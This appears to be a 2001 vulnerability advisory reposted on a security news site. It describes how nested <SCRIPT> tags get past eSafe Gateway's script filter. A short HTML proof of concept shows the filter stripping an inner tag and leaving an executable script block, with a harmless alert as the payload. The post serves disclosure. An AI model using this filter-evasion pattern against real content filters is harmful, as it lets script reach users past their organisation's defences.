Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » eSafe Gateway Script-filtering Bypass Vulnerability

eSafe Gateway Script-filtering Bypass Vulnerability

by platon on May 23rd, 2001 eSafe Gateway is a security utility used for filtering internet content...


An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply changing the syntax of the <SCRIPT>
function in such a way as to trick the filter into generating html that still includes a call to execute the script.

EXPLOIT:
This exploit was provided by eDvice:



Details

----------------------

Let's say for example that we want the following HTML code to enter an

organization and the script it contains to be executed:



<HTML><HEAD></HEAD>

<BODY>

<SCRIPT language="JavaScript">

alert("hi");

</SCRIPT>

</BODY></HTML>



If we run this page through eSafe's filtering engine, the script will be

filtered and the resulting with the following HTML code:



<HTML><HEAD></HEAD>

<BODY>



</BODY></HTML>



However, if we create the following code:



<HTML><HEAD></HEAD>

<BODY>

<SCRIPT<script language="javascript"> </script> language="javascript">

alert("hi");

</SCRIPT>

</BODY></HTML>



Then the inner "<script language="javascript"> </script>" will be extracted

and we will be left with the following HTML code:



<HTML><HEAD></HEAD>

<BODY>

<SCRIPT language="javascript">

alert("hi");

</SCRIPT>

</BODY></HTML>



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »